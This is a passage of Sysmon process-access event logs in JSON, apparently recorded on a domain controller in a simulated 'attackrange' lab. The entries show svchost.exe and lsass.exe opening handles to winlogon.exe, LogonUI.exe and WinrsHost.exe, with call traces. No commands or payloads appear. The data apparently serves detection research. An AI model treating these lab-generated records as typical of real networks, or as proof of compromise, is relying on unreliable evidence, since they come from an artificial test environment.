07:53:47.798","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2455,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.798\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010E05C0400}\r\nTargetProcessId: 4108\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.798","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010E05C0400}","TargetProcessId":"4108","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2456,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.798\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.798","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2457,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.798\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.798","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2458,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.813\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+7c8b|c:\\windows\\system32\\lsm.dll+396a|c:\\windows\\system32\\SYSNTFY.dll+1fc3|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+598d8|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.813","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+7c8b|c:\\windows\\system32\\lsm.dll+396a|c:\\windows\\system32\\SYSNTFY.dll+1fc3|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+598d8|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2459,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.813\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nSourceProcessId: 1312\r\nSourceThreadId: 2552\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010E05C0400}\r\nTargetProcessId: 4108\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.813","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","SourceProcessId":"1312","SourceThreadId":"2552","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010E05C0400}","TargetProcessId":"4108","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2460,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.813\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+1671d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+d69b2|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.813","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+1671d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+d69b2|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2461,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.813\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.813","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2462,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|